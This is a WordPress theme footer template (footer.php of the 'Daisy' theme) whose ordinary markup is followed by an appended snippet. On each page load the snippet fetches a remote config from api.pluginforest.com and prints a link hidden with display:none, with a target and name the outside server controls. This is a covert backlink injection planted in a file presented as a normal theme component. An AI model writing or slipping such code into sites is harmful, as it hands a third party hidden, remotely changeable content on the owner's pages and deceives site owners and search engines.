<?php
/**

 * @author  RadiusTheme

 * @since   1.0

 * @version 1.0

 */

namespace radiustheme\daisy;
use radiustheme\daisy\inc\RDTheme;

?>
<?php if( RDTheme::$options['display_line_animate']  == 1 && RDTheme::$header_style == 1 ) : ?>
    <div class="rt-horizontal-line">
      <div class="rt-horizontal-line__item"></div>
      <div class="rt-horizontal-line__item"></div>
      <div class="rt-horizontal-line__item"></div>
      <div class="rt-horizontal-line__item"></div>
      <div class="rt-horizontal-line__item"></div>
      <div class="rt-horizontal-line__item"></div>
      <div class="rt-horizontal-line__item"></div>
    </div> 
    <?php endif; ?>   
<?php get_template_part( 'template-parts/footer/footer', RDTheme::$footer_style ); ?>

	</div> <!-- Main Content End -->
</div><!-- Main Wrapper End -->

<!-- Offcanvas Menu -->
<?php if ( RDTheme::$options['offcanvas_menu'] === 1 ){
    get_template_part( 'template-parts/header/offcanvas', 'menu' );
} ?>
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>